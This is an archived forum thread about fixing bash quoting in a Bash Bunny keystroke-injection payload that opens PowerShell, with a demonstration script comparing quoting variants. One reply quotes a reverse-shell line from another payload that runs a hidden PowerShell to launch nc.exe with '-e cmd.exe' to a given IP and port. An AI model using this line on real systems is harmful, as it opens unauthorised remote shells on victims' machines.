HamHack Posted February 9, 2018

Hey. For some reason my Bash Bunny script gets stuck right after opening up PowerShell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is. This is my script:

    LED SETUP
    ATTACKMODE HID STORAGE
    LED ATTACK
    Q SET_LANGUAGE gb
    Q GUI r
    Q DELAY 150
    Q STRING powershell
    Q ENTER
    Q DELAY 500
    Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
    Q ENTER
    Q STRING cd payloads/switch1
    Q ENTER
    LED FINISH
GermanNoob Posted February 9, 2018

@HamHack, just use some quotes around the string:

    Q STRING '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''

Also think about using RUN WIN powershell.
HamHack (Author) Posted February 9, 2018

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny. It's being written like this:

    cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this:

    cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?
GermanNoob Posted February 9, 2018

I'm not a PowerShell guy, to be honest... But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell?

    QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
HamHack (Author) Posted February 9, 2018

@GermanNoob Well, do you know why I can't get the Rubber Ducky to write single quotes? It freezes every time I try to make it write them. Can I somehow escape them or something?
GermanNoob Posted February 9, 2018

I suppose because within the QUACK code there is a single quote used (but that's only an assumption)... You will find a lot of stuff on this topic here: http://wiki.bash-hackers.org/syntax/quoting
PoSHMagiC0de Posted February 9, 2018

The issue is with how bash on the Bunny is interpreting your string. An example: echo that line in a Linux bash terminal and you will see the issue, i.e. replace "quack string" with echo, if you have access to a bash terminal. If not, then here is a trick. After your QUACK STRING, encapsulate the whole command in double quotes. Once you do that, you will only need to escape "$" and other inner double quotes. Single quotes can be by themselves without needing to escape. Example:

    Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.
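As an added example (not code from the thread or from Hak5), the following bash script stands in for the Bunny's Q/QUACK STRING with a function that just prints the argument it receives, and runs each quoting variant from this thread through it so you can see exactly what bash hands over before anything is typed. The function names quack_string, unquoted_status, triple_single_quotes, double_quoted and single_quoted_spliced are mine; the '\'' splice is a standard shell idiom that nobody in the thread mentioned.

```shell
#!/usr/bin/env bash
# Added example, not from the Hak5 thread: a stand-in for the Bunny's Q/QUACK
# STRING that prints what it receives, so the effect of bash's own quoting pass
# is visible without any HID typing.

# Stand-in for `Q STRING ...`: join the arguments exactly as bash hands them over.
quack_string() {
    printf '%s\n' "$*"
}

# The thread's original, unquoted line, parse-checked with bash -n: the bare
# parentheses are shell syntax, so bash reports a syntax error (status 2) and
# never reaches QUACK. The inner single quotes are left out of this wrapper
# only to keep it readable; they do not change the parse error.
unquoted_status() {
    if bash -n -c 'Q STRING cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)' 2>/dev/null; then
        echo 0
    else
        echo "$?"
    fi
}

# GermanNoob's ''' ... ''' form: bash reads '' (empty), then '...label=',
# then BashBunny unquoted, then '")...', then '' (empty). The quotes around
# BashBunny are consumed by bash, which is exactly what HamHack observed.
triple_single_quotes() {
    quack_string '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''
}

# PoSHMagiC0de's fix: double-quote the whole command and escape only the inner
# double quotes; single quotes pass through untouched. A literal $ would need \$.
double_quoted() {
    quack_string "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"
}

# Same result with single quotes and the '\'' splice (close the string, add a
# literal ', reopen). Nothing expands inside, so $ never needs escaping.
single_quoted_spliced() {
    quack_string 'cd (gwmi -class win32_volume -filter "label='\''BashBunny'\''").Name.Substring(0,2)'
}

# Print all four variants side by side when run directly.
main() {
    echo "unquoted             -> bash exit status $(unquoted_status)"
    echo "triple single quotes -> $(triple_single_quotes)"
    echo "double quoted        -> $(double_quoted)"
    echo "single quoted splice -> $(single_quoted_spliced)"
}

main "$@"
```

Run it with bash on any Linux box (payload.txt on the Bunny is a bash script, so the same parser applies). The first line of output is the part the thread never spelled out: bash executes a script one line at a time and aborts at the first line it cannot parse, so the original payload got as far as opening PowerShell and then simply stopped. Between the two working forms, remember that double quotes still let bash expand `$`, which is convenient for Bunny variables like `${SWITCH_POSITION}` but means a PowerShell `$var` that should be typed literally has to be written `\$var`; the single-quoted splice avoids that trade-off at the cost of uglier quoting.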
HamHack (Author) Posted February 9, 2018

@PoSHMagiC0de Hallelujah! I guess I'll be sleeping tonight after all. Thank you very much!
This topic is now archived and is closed to further replies.